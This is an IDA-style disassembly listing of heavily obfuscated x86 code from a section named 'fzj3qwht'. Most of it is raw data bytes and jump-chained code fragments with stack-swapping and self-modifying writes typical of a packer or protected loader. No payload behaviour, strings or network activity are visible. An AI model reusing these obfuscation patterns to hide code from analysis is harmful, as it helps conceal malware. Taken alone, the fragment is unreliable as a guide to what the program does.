dd 5FDF8B00h, 87F18B56h, 0DFE92434h, 0FFFFF9h, 0D681C60Bh
dd 63D54C62h, 0FFE23CE9h, 870000FFh, 815A2414h, 0FCA4C7F3h
db 0BFh
db 0DFh, 0D3h, 0E8h ; DATA XREF: fzj3qwht:00431E0A�o
dd 1B76h
db 0
; ---------------------------------------------------------------------------
loc_430D55: ; CODE XREF: fzj3qwht:0042F7BA�j
xchg edx, [esp]
mov ebp, esp
push ebp
mov ebp, ecx
push 42F619h
jmp locret_42EE5D
; ---------------------------------------------------------------------------
align 4
dd 8707C600h, 1C58685Fh, 815B2892h, 0AC5EFCBh, 0A6C3815Ah
dd 0E885A81Bh, 0FFFFEC13h
db 0
; ---------------------------------------------------------------------------
loc_430D85: ; DATA XREF: sub_42F4AE+205�o
xchg ebx, [esp]
push ecx
mov ecx, edi
xchg ecx, [esp]
pushf
push 7AB0900Ah
jmp loc_43050D
; ---------------------------------------------------------------------------
db 0E8h, 0EAh, 0E3h
dd 0FFFFh, 1368E9h, 0E9000000h, 1442h, 24148700h, 3FC0815Ah
dd 0E8BA6637h, 1A10h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_430DBE: ; CODE XREF: fzj3qwht:0042ED3E�j
retn
; ---------------------------------------------------------------------------
align 10h
mov edi, [ecx]
not esi
jmp sub_42F263
; ---------------------------------------------------------------------------
loc_430DC9: ; CODE XREF: fzj3qwht:loc_430A7B�j
push offset loc_43257B
jmp loc_4311DC
; ---------------------------------------------------------------------------
align 4
dd 0FC45C700h, 1, 0EC7BBB53h, 45E90042h, 0FFFFDDh, 0D68B5200h
dd 0E8241487h, 1857h, 0E900C300h, 0FFFFFB2Ah, 403E9h, 0E85FC300h
dd 0FFFFEAD4h, 755E9h, 87000000h, 76BE9F5h, 0
; ---------------------------------------------------------------------------
loc_430E18: ; CODE XREF: fzj3qwht:loc_43038B�j
popf
xor eax, eax
mov [ebp-10h], eax
cmp dword ptr [ebp-8], 0
jmp near ptr dword_42F78C+1Ah
; =============== S U B R O U T I N E =======================================
sub_430E27 proc near ; CODE XREF: fzj3qwht:00431EE8�p
; FUNCTION CHUNK AT 0042F7CC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042FD05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431811 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00431FD9 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov edi, offset loc_42F7D3
jmp loc_42FD05
sub_430E27 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
dw 128Bh
dd 572414DBh, 43124F68h, 0E5F5E900h
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_430E46 proc near ; CODE XREF: fzj3qwht:0042EDED�j
; sub_430C13:loc_43013E�p
; FUNCTION CHUNK AT 0042F957 SIZE 0000000F BYTES
xchg ebx, [esp+0]
pop ebx
mov [edx], eax
pop edx
jmp loc_42F957
sub_430E46 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431167
loc_430E53: ; CODE XREF: sub_431167:loc_430837�j
xchg ecx, [esp+0]
or eax, ebx
jmp loc_430E98
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 0FFED1989h, 0D38B52FFh, 0BB241487h, 42F786h, 0FFE907E9h
db 0FFh
db 50h, 0E8h, 2Ch ; DATA XREF: sub_42FA52+24FA�o
dd 0F000012h, 0B448Dh, 0E9000000h, 0FFFFDFA8h, 0C58DC281h
dd 2AE921FAh, 0Bh
db 0
; ---------------------------------------------------------------------------
locret_430E95: ; CODE XREF: fzj3qwht:0042FEF1�j
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_431167
loc_430E98: ; CODE XREF: sub_431167-30F�j
jmp loc_42EF10
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h ; CODE XREF: fzj3qwht:loc_432789�j
dd 1812h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_430EA7: ; CODE XREF: sub_4301B7:loc_42ED0A�j
; fzj3qwht:loc_42EE5E�j
add eax, 0B2473A38h
loc_430EAD: ; DATA XREF: fzj3qwht:00430ED8�o
imul eax, ebp, 7F58C081h
lodsb
fmul qword ptr [ebx-347EF100h]
stc
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
db 0FFh
dd 0E11CE9FFh, 0FFFFh, 0FF02885Fh, 45FFF04Dh, 0F07D0CFCh
dd 1F8D0F00h
db 0DCh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_430ED7: ; CODE XREF: fzj3qwht:loc_431B61�j
push edx
mov edx, offset loc_430EAD
jmp loc_431A25
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_430EE3: ; CODE XREF: fzj3qwht:00431013�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_430EE6: ; CODE XREF: sub_42F4AE+1C9�j
jmp near ptr dword_42EA44+0D3h
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 4
dd 89800F00h, 0FFFFFDFh, 0FFFEF188h, 0E003E9FFh, 0FFFFh
dd 0DD7CE950h, 0C87FFFFh, 0F0B3E924h, 1C6FFFFh, 0F9F759FFh
dd 0FACE6851h, 0C1590745h, 0F18117C1h, 32BFDF64h, 0FFF53DE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
sub_430F2A proc near ; CODE XREF: sub_4312D7+859�p
; FUNCTION CHUNK AT 0043246C SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
push eax
mov eax, offset loc_42F84D
jmp loc_43246C
sub_430F2A endp
; ---------------------------------------------------------------------------
align 2
dw 0D068h
dd 0E900430Ch, 0FFFFF8CFh
db 0
; ---------------------------------------------------------------------------
loc_430F45: ; CODE XREF: fzj3qwht:0042FEB4�j
ror eax, 1Eh
; =============== S U B R O U T I N E =======================================
sub_430F48 proc near ; CODE XREF: sub_4301AC+1B25�p
; FUNCTION CHUNK AT 0042FB2D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004303B9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043167B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432450 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004327D8 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push edi
push 452D8DE0h
pop edi
jmp loc_432450
sub_430F48 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_430F5C: ; CODE XREF: sub_42F4AE+F0�j
; fzj3qwht:004317E8�j
xor edx, edi
xchg eax, [esp-0Ch+arg_8]
loc_430F61: ; CODE XREF: sub_431686:loc_432775�j
xchg edi, [esp-0Ch+arg_8]
push offset byte_43217D
jmp loc_43000C
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 10h
pop ecx
xchg ebx, [eax]
jmp loc_4328CA
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431E69
loc_430F79: ; CODE XREF: sub_431E69+D�j
mov eax, offset loc_43287C
jmp loc_432872
; END OF FUNCTION CHUNK FOR sub_431E69
; ---------------------------------------------------------------------------
align 4
dd 241FBF00h, 46E90043h, 87FFFFE5h, 0DDBF240Ch, 0E900431Bh
dd 89Fh, 788C6800h, 815B212Fh, 6746B0EBh, 58C38102h
db 6Fh, 7Ah, 0E1h
byte_430FAF db 66h ; DATA XREF: fzj3qwht:00432680�o
; ---------------------------------------------------------------------------
sbb al, 24h
retn
; ---------------------------------------------------------------------------
align 4
loc_430FB4: ; CODE XREF: fzj3qwht:0042E901�j
jmp loc_43100B
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_430FBB: ; CODE XREF: sub_431F5F:loc_430A3A�j
mov edx, [eax]
or edx, edx
jmp loc_4325FB
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
db 2 dup(0)
aHSoxbstxpchC db 'hÝš‘®Xè’•¯—hê(C',0 ; DATA XREF: fzj3qwht:0042EE9A�o
db 0E9h
; ---------------------------------------------------------------------------
push ebx
fdivr st, st(7)
inc dword ptr [eax]
add bl, al
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_430FDF: ; CODE XREF: sub_42F4AE+11B�j
jmp nullsub_143
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dd 0EC49BB53h, 79E90042h
db 0EDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_430FEF: ; CODE XREF: fzj3qwht:0043265B�j
mov edi, ecx
xchg edi, [esp]
push 0B2061AFCh
pop esi
and esi, 0E05E21C9h
or esi, 12BB8FE4h
jmp loc_43284F
; ---------------------------------------------------------------------------
loc_43100B: ; CODE XREF: fzj3qwht:loc_430FB4�j
add eax, edi
pop edi
push offset word_43263A
jmp locret_430EE3
; ---------------------------------------------------------------------------
dd 6C60000h, 0A0B95E03h, 0E90042EAh, 0FFFFE9ACh, 240C8700h
; CODE XREF: sub_431C85+C�j
dd 8B243C87h, 7C65FCFh, 0E02688Bh, 0C2E90043h
db 0FDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43103F: ; CODE XREF: fzj3qwht:0042F90C�j
xchg eax, [esp]
pop eax
push ebx
push edx
push 0B83AA6B6h
pop edx
jmp loc_43162A
; ---------------------------------------------------------------------------
dd 0EF815F00h, 0CF3419F8h, 0C781C7D1h, 10899CFCh, 0E906C7C1h
dd 0FFFFE3DAh, 0CE815E00h, 8C44D0DDh, 8716F681h, 0C6C16A5Dh
dd 0AAC68112h, 0E98C9B5Eh, 0FFFFEDEBh, 8B06C600h, 8FCE8h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43108F: ; CODE XREF: fzj3qwht:00430377�j
jmp loc_42F34C
; ---------------------------------------------------------------------------
dd 3C870000h, 54885F24h, 0BE68E005h, 5840EFB1h, 0F4D5E881h
dd 0C0814095h, 0A0EC7B95h, 0FFDB48E9h, 0B2810FFFh, 0E9000017h
dd 0DBDh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_4310C1: ; CODE XREF: sub_431686:loc_430B7C�j
push 0D46C9A3Bh
call sub_430BD8
loc_4310CB: ; CODE XREF: fzj3qwht:0042E8A7�j
jmp loc_42EC41
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
xchg edx, [esp]
push 750CB83Fh
xchg esi, [esp]
mov ebx, esi
jmp loc_432008
; ---------------------------------------------------------------------------
dw 0F00h
dd 0FFE5B983h, 0E67EE9FFh, 0FFFFh, 0C481EC8Bh, 0FFFFFF74h
dd 0FFDE64E8h, 0E90000FFh, 0FFFFEE4Fh, 2DE800h, 0
; ---------------------------------------------------------------------------
jmp loc_43127F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_431113: ; CODE XREF: fzj3qwht:loc_42F99E�j
jmp sub_42FCC8
; ---------------------------------------------------------------------------
loc_431118: ; CODE XREF: fzj3qwht:loc_42E950�j
mov byte ptr [eax], 87h
xchg ecx, [esp]
mov eax, ecx
pop ecx
mov ecx, esi
pop esi
jmp near ptr loc_43247B+1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_43112B: ; CODE XREF: sub_431F5F-2DF2�j
or ebx, 13FAD79Dh
jmp near ptr dword_42EB78+39h
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
dw 8700h
; ---------------------------------------------------------------------------
or al, 24h
pop ecx
push 42633AEBh
pop edx
sub edx, 0A0FC59DBh
jmp loc_4326A3
; ---------------------------------------------------------------------------
dd 0ED810000h, 0BC7A3344h, 87241C87h, 0DA8B2414h, 9431685Ah
dd 0B1E9472Fh
db 0F5h, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_431167 proc near ; CODE XREF: sub_431452�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042EF10 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042FF7C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430025 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430837 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430E53 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00430E98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043281C SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
xchg ecx, [esp+0]
xchg eax, [esp+0]
mov ecx, eax
pop eax
push ecx
mov ecx, eax
jmp loc_430837
sub_431167 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0C7685300h, 872E4E3Ch, 0DD8B242Ch, 57C3D15Dh, 0FFFF7BE9h
dd 30000FFh, 110CE9DAh, 0
; ---------------------------------------------------------------------------
loc_43119C: ; CODE XREF: fzj3qwht:loc_4309D2�j
mov esi, 42FBD7h
jmp near ptr byte_42F52D+2
; ---------------------------------------------------------------------------
loc_4311A6: ; CODE XREF: fzj3qwht:loc_43025A�j
mov byte ptr [edx], 89h
pop edx
push edi
push offset loc_42FD94
jmp loc_430AD1
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 0FFF18787h, 240C87FFh, 8BF08159h, 0E9DA5CD1h, 0FFFFDAAFh
; CODE XREF: fzj3qwht:00432362�p
dd 0F87D83h, 6568D0Fh, 0CBE80000h, 0FFFFEAh
; ---------------------------------------------------------------------------
loc_4311DC: ; CODE XREF: fzj3qwht:00430DCE�j
jmp locret_42F584
; ---------------------------------------------------------------------------
align 2
dw 0CEC1h
dd 0F780E918h, 8F0FFFFFh, 0A9Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_4311F0: ; CODE XREF: sub_431F5F:loc_42F167�j
call sub_42A134
loc_4311F5: ; CODE XREF: fzj3qwht:0043036A�j
; sub_431F5F+B�j
xchg ebx, [esp+0]
mov eax, ebx
jmp loc_431D14
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
align 10h
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_431202: ; CODE XREF: fzj3qwht:004306E9�j
retn
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFF107h, 67680000h, 0E9004318h, 0FFFFFC6Bh, 3C87FA8Bh
dd 1BDBA24h, 0FAE90043h, 3
; ---------------------------------------------------------------------------
loc_431228: ; CODE XREF: fzj3qwht:loc_432467�j
mov byte ptr [eax], 1
pop eax
lodsb
loc_43122D: ; DATA XREF: fzj3qwht:0042FB7F�o
add edx, eax
rol edx, 3
loc_431232: ; CODE XREF: fzj3qwht:0042F7BF�j
call near ptr dword_42F064+3Fh
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AED
loc_431239: ; CODE XREF: sub_431AED+F�j
pop esi
xchg ebx, [esp-4+arg_0]
mov ecx, ebx
pop ebx
push 0C4F30422h
xchg esi, [esp-4+arg_0]
mov eax, esi
jmp loc_4316D0
; END OF FUNCTION CHUNK FOR sub_431AED
; ---------------------------------------------------------------------------
db 9Ch
dd 0C9A47C68h, 0CF815F5Ah, 2E8D35F7h, 0FCDBC781h, 0FD030241h
dd 4D32C781h, 0A1E97EF0h, 0FFFFEAh
; ---------------------------------------------------------------------------
loc_431270: ; CODE XREF: fzj3qwht:loc_42F984�j
call sub_42FF32
; ---------------------------------------------------------------------------
db 2 dup(0), 55h
; ---------------------------------------------------------------------------
jmp loc_42E77C
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43127F: ; CODE XREF: fzj3qwht:0043110C�j
push 0B9FA1DE8h
pop edi
rol edi, 11h
add edi, 0F7BBB1CFh
loc_43128E: ; CODE XREF: fzj3qwht:0042EA26�j
jmp loc_42FACF
; ---------------------------------------------------------------------------
align 4
dd 0FD4A6800h, 0B8E90042h, 1, 0A4F0DB81h, 0DF1B33B6h, 9A5E9h
dd 81000000h, 885C65CEh, 0E52CE9E3h, 0C300FFFFh
; ---------------------------------------------------------------------------
loc_4312BC: ; CODE XREF: fzj3qwht:0042F492�j
jmp loc_43169A
; ---------------------------------------------------------------------------
align 2
locret_4312C2: ; CODE XREF: fzj3qwht:004313A9�j
retn
; ---------------------------------------------------------------------------
loc_4312C3: ; CODE XREF: fzj3qwht:00430832�j
pushf
push edx
push 0E5366D6Eh
push esi
mov esi, offset loc_42F957
jmp loc_42F8B4
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4312D7 proc near ; CODE XREF: sub_42F04D+D�p
; fzj3qwht:004303D5�j
; FUNCTION CHUNK AT 0042F7B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004302A9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00431B2E SIZE 00000007 BYTES
xchg ebx, [esp+0]
pop ebx
push 0D8027EBFh
xchg edi, [esp+0]
mov eax, edi
jmp loc_42F7B5
sub_4312D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_431452
loc_4312EC: ; CODE XREF: sub_431452+96�j
xchg edx, [esp+0]
mov edi, edx
pop edx
mov byte ptr [eax], 0C3h
push edx
push 0DE570ECDh
xchg esi, [esp+4+var_4]
jmp loc_42F4E0
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
rol ecx, 6
sub ecx, 69C05D74h
xor ecx, 5C00984Eh
sub ecx, 222D6085h
add ecx, 8CB5E104h
jmp loc_4325EE
; ---------------------------------------------------------------------------
db 0E8h
dd 0FFFFF826h, 0E77AE900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43132E: ; CODE XREF: fzj3qwht:0042F7F8�j
mov byte ptr [ebx], 88h
pop ebx
add edx, 30h
push 0AB6C8639h
pop eax
jmp loc_4300D1
; ---------------------------------------------------------------------------
dd 242C8700h, 815DC58Bh, 0EB4CBAE0h, 0DAE88113h, 0E9EAF184h
dd 0FFFFEA78h
; ---------------------------------------------------------------------------
locret_431358: ; CODE XREF: fzj3qwht:00430881�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
dd 5B5B241Ch, 8B240C87h, 8F6859D9h, 0E9004302h, 0FFFFDB42h
dd 26A2D281h, 0BCE9E887h, 0FFFFFDh, 0E9CF3B5Eh, 0FFFFFE33h
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_431F11
loc_431388: ; CODE XREF: sub_431F11+7�j
jmp loc_43270D
; END OF FUNCTION CHUNK FOR sub_431F11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_43138D: ; CODE XREF: sub_4301AC:loc_430C2F�j
add edi, 91DF98CFh
cmp eax, edi
pop edi
jmp near ptr byte_42E865+2
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
align 4
dd 0E9589D00h, 0FFFFF8C8h
; ---------------------------------------------------------------------------
loc_4313A4: ; CODE XREF: fzj3qwht:004328B3�j
push offset dword_4308DC
jmp locret_4312C2
; ---------------------------------------------------------------------------
dw 8100h
dd 0E53B80C5h, 0EE5EE9A5h, 0FFFFh, 689C008Bh, 0C4D4678Ah
dd 0F64E959h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_4313CB: ; CODE XREF: fzj3qwht:loc_42F9FA�j
call sub_43239B
sbb esi, ebx
and eax, 17AD334Ah
rol eax, 18h
xor eax, 655EA351h
push offset word_4327A6
jmp locret_43188F
; ---------------------------------------------------------------------------
loc_4313EB: ; CODE XREF: fzj3qwht:loc_42FA05�j
jp loc_430173
; =============== S U B R O U T I N E =======================================
sub_4313F1 proc near ; CODE XREF: fzj3qwht:0043027C�p
xchg ecx, [esp+0]
pop ecx
push edx
push 42ECA6h
jmp nullsub_157
sub_4313F1 endp
; ---------------------------------------------------------------------------
dd 11870000h, 0E914E9C1h, 0FFFFF08Bh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43140E: ; CODE XREF: fzj3qwht:00430174�j
mov [ebx], ecx
; =============== S U B R O U T I N E =======================================
sub_431410 proc near ; CODE XREF: fzj3qwht:0042EFC8�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042FE63 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00431A18 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431A37 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004320F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432616 SIZE 00000015 BYTES
xchg eax, [esp+0]
pop eax
add eax, 8443A509h
loc_43141A: ; CODE XREF: sub_42F4AE+EA�j
mov eax, [eax]
sub eax, edx
jz loc_42FE63
jmp loc_432616
sub_431410 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
xor esi, 0B02F0C60h
and esi, 0A62240BAh
xor esi, 7D6371B8h
add edx, esi
pop esi
mov edx, [edx]
jmp loc_432789
; ---------------------------------------------------------------------------
loc_431446: ; DATA XREF: fzj3qwht:0042FE17�o
mov byte ptr [ebp-20h], 30h
inc dword ptr [ebp-10h]
; START OF FUNCTION CHUNK FOR sub_431686
loc_43144D: ; CODE XREF: sub_431686:loc_431C97�j
call sub_42FED0
; END OF FUNCTION CHUNK FOR sub_431686
; =============== S U B R O U T I N E =======================================
sub_431452 proc near ; CODE XREF: fzj3qwht:0042EF4B�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042EF52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FCE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430338 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00430598 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004312EC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00431946 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431A88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431D26 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00431EF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004320D8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004325F3 SIZE 0000000D BYTES
call sub_431167
jmp locret_4315E0
; ---------------------------------------------------------------------------
dd 59240C87h, 0DED6C681h, 34877F73h, 0D38CE824h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43146F: ; CODE XREF: sub_42FFDE+17F3�j
jmp nullsub_141
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_431475: ; CODE XREF: fzj3qwht:0042F7EF�j
jmp loc_431D26
; ---------------------------------------------------------------------------
or esi, 0CB694E7Ch
loc_431480: ; CODE XREF: sub_42E990+4�p
xchg edi, [esp+4+var_4]
pop edi
xchg edx, [esp+0]
push offset byte_430405
jmp loc_431EF6
; ---------------------------------------------------------------------------
db 87h, 1Ch, 24h
dd 0FFDDBDE9h
db 0FFh
db 8Dh, 5, 9Dh ; DATA XREF: sub_431F38+5�o
dd 68004321h, 431714h, 0FFFD5EE9h, 0F0000FFh, 0FFDC0B85h
dd 0FC1AE9FFh, 0FFFFh, 0CB1B078Bh, 0FFDBF5E9h, 810000FFh
dd 5D5006FDh, 0F694E976h, 8100FFFFh, 0DB902CD5h, 0F823E99Ch
dd 0F00FFFFh, 92880h
db 0
; ---------------------------------------------------------------------------
loc_4314E1: ; CODE XREF: fzj3qwht:0042F2A3�p
xchg esi, [esp+4+var_4]
pop esi
xchg edi, [esp+0]
jmp loc_4312EC
; ---------------------------------------------------------------------------
db 0Fh, 83h, 3Dh
dd 0E9FFFFE0h, 0FFFFDF08h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_4314FA: ; CODE XREF: sub_4301B7-723�j
retn
; ---------------------------------------------------------------------------
align 4
dd 0FFFA8EE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_431502: ; CODE XREF: fzj3qwht:0042EEF0�j
call near ptr dword_42EEA4+15h
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_431508: ; CODE XREF: fzj3qwht:loc_42EA3F�j
retn
; ---------------------------------------------------------------------------
db 0E9h, 2Ch, 0FAh
dd 1268FFFFh, 87487869h
; ---------------------------------------------------------------------------
std
xor esi, edx
loc_431517: ; CODE XREF: sub_430AEE:loc_430C3D�j
call sub_42EE90
loc_43151C: ; CODE XREF: sub_42F4AE+2F8F�p
xchg edx, [esp+0]
pop edx
push 8FD8D7ACh
xchg ecx, [esp+0]
mov edx, ecx
pop ecx
and edx, 4FA92517h
jmp loc_431946
; ---------------------------------------------------------------------------
dw 339Ch
dd 52E881F1h, 68A4B4D8h, 430690h, 0FFF144E9h, 810000FFh
dd 47C3E1C2h, 243487ACh, 0E8C3815Eh, 0E9D40303h, 0FFFFF001h
dd 689D0000h, 431675h, 61AE9h, 0C30000h, 241C8700h, 0C87CB8Bh
dd 0E9D98B24h, 0FFFFF048h, 24148700h, 0EB8B555Ah, 0FFE016E9h
dd 0C10000FFh, 0FCE905EBh, 0C1FFFFF2h
db 0E8h, 3
; ---------------------------------------------------------------------------
loc_43159A: ; CODE XREF: sub_42FF6B:loc_432476�p
xchg eax, [esp-4+arg_0]
xchg ebp, [esp-4+arg_0]
mov eax, ebp
pop ebp
mov byte ptr [esi], 0Fh
pop esi
jmp loc_42EF52
; ---------------------------------------------------------------------------
locret_4315AC: ; CODE XREF: sub_42F4AE+3138�j
retn
; ---------------------------------------------------------------------------
loc_4315AD: ; CODE XREF: fzj3qwht:00432674�j
jmp near ptr dword_42EA44+12h
; ---------------------------------------------------------------------------
db 0C6h ; Æ
db 1
db 9Ch ; œ
db 59h ; Y
db 81h ;
db 0CBh ; Ë
db 39h ; 9
db 79h ; y
db 0Ah
db 9Ah ; š
db 81h ;
db 0EBh ; ë
db 29h ; )
db 0EBh ; ë
db 0E7h ; ç
db 0Ah
db 81h ;
db 0CBh ; Ë
db 1Eh
db 11h
db 92h ; ’
db 0BCh ; ¼
db 0E9h ; é
db 54h ; T
db 0F5h ; õ
db 0FFh
db 0FFh
db 89h ; ‰
db 3Eh ; >
db 0E9h ; é
db 0CDh ; Í
db 0F1h ; ñ
db 0FFh
db 0FFh
db 1Bh
db 0F3h ; ó
db 87h ; ‡
db 3Ch ; <
db 24h ; $
db 5Fh ; _
db 56h ; V
db 0E9h ; é
db 29h ; )
db 6
db 0
db 0
; ---------------------------------------------------------------------------
locret_4315E0: ; CODE XREF: sub_431452+5�j
retn
sub_431452 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 0FFDAA2E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_4315EA: ; CODE XREF: sub_4301AC+1B2A�j
jge loc_431DA4
add cl, al
jecxz short loc_431604
sub eax, 0E59B55E5h
mov eax, [esi]
not ebx
jmp loc_431DA4
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4301AC
loc_431604: ; CODE XREF: sub_4301AC+1446�j
; fzj3qwht:loc_4321CF�j
add [edi], cl
test [ecx+0Dh], dl
; END OF FUNCTION CHUNK FOR sub_4301AC
; ---------------------------------------------------------------------------
db 2 dup(0), 55h
; ---------------------------------------------------------------------------
or ebp, esi
push 0E910C2EEh
add edx, 0D85253DDh
jmp loc_43235C
; ---------------------------------------------------------------------------
dw 0C300h
dd 0F0E6E900h
db 2 dup(0FFh), 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43162A: ; CODE XREF: fzj3qwht:0043104B�j
jmp loc_43172C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_42FF6B
loc_431630: ; CODE XREF: sub_42FF6B+9�j
jmp loc_42FD40
; END OF FUNCTION CHUNK FOR sub_42FF6B
; ---------------------------------------------------------------------------
loc_431635: ; CODE XREF: fzj3qwht:0042EEFB�j
jmp loc_4301ED
; ---------------------------------------------------------------------------
dw 8700h
dd 24E82434h, 0FFFFE5h, 1320E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_43164B: ; CODE XREF: sub_4301B7:loc_4324AA�j
test ecx, 200000h
jmp loc_42EA10
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
dw 0E981h
